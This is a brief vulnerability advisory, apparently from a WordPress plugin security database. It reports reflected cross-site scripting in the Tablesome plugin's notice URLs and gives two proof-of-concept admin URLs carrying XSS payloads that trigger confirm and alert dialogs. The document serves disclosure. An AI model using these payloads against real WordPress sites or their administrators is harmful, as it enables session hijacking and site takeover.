The plugin does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting
Make a logged in admin open one of the URL below when the feature/tracking notice has not been dismissed yet https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&a;">'><details%2Fopen%2Fontoggle%3Dconfirm('XSS')> https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&tablesome;_feature_notice_dismissed=1&alert(/XSS/)